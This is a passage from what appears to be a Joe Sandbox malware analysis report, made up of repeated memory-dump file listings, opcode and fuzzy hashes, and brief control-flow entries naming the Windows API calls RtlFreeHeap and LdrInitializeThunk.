                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a1ae83a1513273ff546f33722dbe1759837756168878b98cf98a8f70dc96b2d3
                                                                                                          • Instruction ID: c725090c31cdbc4436a9ff324425e8c07235eb94d99a0ef0a209a91dea86d28c
                                                                                                          • Opcode Fuzzy Hash: a1ae83a1513273ff546f33722dbe1759837756168878b98cf98a8f70dc96b2d3
                                                                                                          • Instruction Fuzzy Hash: A041377440D340ABDB01BF68E694A2EFBF5AF62745F148C1CE5C497252C336D8149B67
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 71239b65e362a377259551e877c18e629e645963b743e4b06ff39b75b9660bd1
                                                                                                          • Instruction ID: b83fb931598b5fd4189873e3688c1603b7104dfb9c383929291fd10c0efea9ca
                                                                                                          • Opcode Fuzzy Hash: 71239b65e362a377259551e877c18e629e645963b743e4b06ff39b75b9660bd1
                                                                                                          • Instruction Fuzzy Hash: 5441CA35608340ABD714DA15E890F2FB7E6EB85B14F65882EE5CA9B341D330E810CB62
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                                                                          • Instruction ID: 3c02b0d15b4793d88ceed72be21f9e6f6aefa9881baac1756b060615a75b4cdc
                                                                                                          • Opcode Fuzzy Hash: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                                                                          • Instruction Fuzzy Hash: 9921C93290C3545BC71B9E29989032EB7E29BCD310F5A853FE9AA4B381D735DD409391
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: b4d3dcd1680ee558e461151f2a8b812f034e18a66530c2118bb1ed2e6221e8d4
                                                                                                          • Instruction ID: f43cf0e79fb4c8c50a2ac8a3c19d3a298c9c1955ebbd70ef34b00f2af90b7e2f
                                                                                                          • Opcode Fuzzy Hash: b4d3dcd1680ee558e461151f2a8b812f034e18a66530c2118bb1ed2e6221e8d4
                                                                                                          • Instruction Fuzzy Hash: F9213AB8A0126A9FDB15CF94CC90BBEBBB1FF4A304F144809E511BB392C735A901CB64

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 357 1d3220-1d322f 358 1d32ac-1d32b0 357->358 359 1d3236-1d3252 357->359 360 1d32a0 357->360 361 1d32a2-1d32a6 RtlFreeHeap 357->361 362 1d3254 359->362 363 1d3286-1d3296 359->363 360->361 361->358 364 1d3260-1d3284 call 1d5af0 362->364 363->360 364->363
                                                                                                          APIs
                                                                                                          • RtlFreeHeap.NTDLL(?,00000000), ref: 001D32A6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292908397.000000000040A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292925106.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292938822.0000000000416000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292954576.000000000041A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292970967.0000000000429000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.000000000042D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292987780.0000000000459000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293032708.0000000000484000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.0000000000485000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293081184.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293112575.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2293126594.000000000049B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_190000_file.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: FreeHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 3298025750-0
                                                                                                          • Opcode ID: bd111f47dda43c950e427fc9a44015e0ed68570087702673903f6b22352a7635
                                                                                                          • Instruction ID: b9d7f2678fd517a8b04447b372201e31997235a5597fce1bcdb1df2cbd303d39
                                                                                                          • Opcode Fuzzy Hash: bd111f47dda43c950e427fc9a44015e0ed68570087702673903f6b22352a7635
                                                                                                          • Instruction Fuzzy Hash: 85016D3490D2909BC701EF58E899A1EBBE9EF5A700F05481CE5C58B761D335DD60DB92

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 367 1d5bb0-1d5be2 LdrInitializeThunk
                                                                                                          APIs
                                                                                                          • LdrInitializeThunk.NTDLL(001D98C0,005C003F,00000002,00000018,?), ref: 001D5BDE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2291826063.0000000000191000.00000040.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2291805872.0000000000190000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291866981.00000000001F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291889814.00000000001FC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2291991777.0000000000352000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292009500.0000000000355000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292035477.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292055017.000000000036E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.0000000000370000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292074652.000000000037B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292140745.0000000000394000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292164446.0000000000395000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292194306.00000000003A9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292212113.00000000003AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292231943.00000000003B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292251103.00000000003B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292265978.00000000003B8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292282951.00000000003BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292597609.00000000003D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292621532.00000000003D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292640171.00000000003D4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292657110.00000000003DC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292673891.00000000003E4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292697162.00000000003E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292714664.00000000003F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292731226.00000000003F8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292745390.00000000003F9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292765271.00000000003FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292798684.0000000000402000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2292892857.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
